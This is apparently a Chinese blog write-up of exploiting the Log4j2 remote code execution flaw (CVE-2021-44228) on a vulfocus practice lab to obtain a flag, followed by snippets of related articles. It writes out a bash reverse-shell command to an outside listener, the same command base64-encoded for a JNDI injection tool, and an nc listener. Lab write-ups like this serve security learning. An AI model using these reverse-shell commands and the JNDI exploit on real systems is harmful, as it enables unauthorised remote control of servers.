代码编织梦想


前言

一、Apache Log4j2是什么?

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。

二、复现步骤

1.工具

工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
下载链接:https://github.com/fangjiuye/jiuye

2.复现过程

1.启用靶场http://vulfocus.fofa.so
1

1
2.进行抓包
1

3.在服务器启动工具
bash -i >& /dev/tcp/ip/1234 0>&1 这条命令需要在https://www.jackson-t.ca/runtime-exec-payloads.html进行编码
在这里插入图片描述

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}-A IP

payload使用下图标记那条(目标环境:在JDK中构建,其trustURLCodebase为false,并且在类路径中具有Tomcat 8+或SpringBoot 1.2.x+):)
在这里插入图片描述并在服务器开启监听
在这里插入图片描述

nc -lvvp 1234

4.在burp进行构造payload
在这里插入图片描述

服务器反shell情况
在这里插入图片描述

5.发现服务器监听无信息返回,进行添加Content-Type头

Content-Type:application/x-www-form-urlencoded

在这里插入图片描述

服务器监听情况,成功反shell
在这里插入图片描述

6.获得flag
在这里插入图片描述


版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48817799/article/details/122215642

vulfocus靶场搭建(实测)-爱代码爱编程

vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 Vulhub、Vulapps 中所有漏洞镜像。 一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom

插件分享 | Vulfocus 快速启动靶场环境一键打靶-爱代码爱编程

前言: 作为安全小白的插件作者,曾经最困惑的就是,拿着自带强大靶标漏洞库的 Goby 去扫描,却总是很难找到漏洞的影子,这让起步去学习安全知识这件事变得困难,后来了解到靶场工具,开始使用 Vulfocus,一个想法随之产生:将 Vulfocus 通过插件的方式集成到 Goby,更方便快捷的一键启动漏洞环境一键扫描漏洞。于是现在的这款插件应运而生~ 0

FOFA log4j2 漏洞专题上线,从安服仔迈向专家只需一个按钮。-爱代码爱编程

Log4j2高危可利用漏洞爆发,FOFA上线漏洞专题、特定指纹收录,助力企业暴露面收敛,陪伴安服仔升级为安全专家。 2021年12月8日,可能会被载入安全历史史册的Apache Log4j2远程代码执行高危漏洞(CVE-2021-44228)被攻击者利用,且该漏洞细节已经被公开扩散。该组件的使用范围之广是前所未有的,大部分JAVA开发的系统会采用Apac

Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell)-爱代码爱编程

文章目录 1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell 最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是

Log4j2远程代码执行-vulfocus-wp-爱代码爱编程

  描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 当前环境测试url:ht

vulfocus/log4j2-rce-2021-12-09:latest通关-爱代码爱编程

别的大佬在漏洞出来后立马复现利用都学明白了,我这个菜鸟开始了 搜到了在vulfocus.fofa.io靶场有更新了,就在这里开始了学习 启动靶场 按照官方说的漏洞位置在/hello,漏洞变量是payload 按照官方说的在hello里面访问hello 查看漏洞是否存在,当然啦,这是靶场怎么会不存在呢,哈哈哈 证明漏洞存在的方式: dnslog地址 构造

Log4j2远程命令执行(cve-2021-44228)复现-爱代码爱编程

目录 用vulfocus docker漏洞环境 漏洞复现-获取shell 用vulfocus docker漏洞环境 docker pull vulfocus/log4j2-rce-2021-12-09:latest ​ docker run -p  8080:8080 -d --name log4j2-rce vulfocus/log4j2-rc

vulfocus.fofa靶场Log4j2远程命令执行2-爱代码爱编程

vulfocus.fofa靶场Log4j2远程命令执行2 前言一、靶场复现总结 前言 名称: ghcr.io/christophetd/log4shell-vulnerable-app:latest 描述: log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 一、靶场复现 工具:JNDIExploit-1.

vulfocus-fofa靶场 Log4j2远程命令执行复现-爱代码爱编程

Log4j2远程命令执行复现 文章目录 Log4j2远程命令执行复现前言一、Apache Log4j2漏洞描述二、复现环境01.工具02.漏洞验证过程03.反弹shell总结 前言 一、Apache Log4j2漏洞描述 描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大

[转]Apache Log4j2远程代码执行漏洞复现及修复建议-爱代码爱编程

文章目录 背景:漏洞编号:影响版本:影响力度:环境搭建:验证漏洞是否存在:漏洞利用:解决方案: 环境:本实验使用vulfocus提供的Log4j2远程命令执行靶机。 声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者

【安全攻防实验-4】Vulfocus练习-log4j2攻击准备-爱代码爱编程

1、环境准备        2、工具准备 2.1安装JNDI-Injection-Exploit git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 2.2 安装MVN mkdip -p /usr/local/apache-maven cd /

用vulfocus靶场环境复现log4j2远程命令执行漏洞_vulfocus拉去log4j漏洞-爱代码爱编程

声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。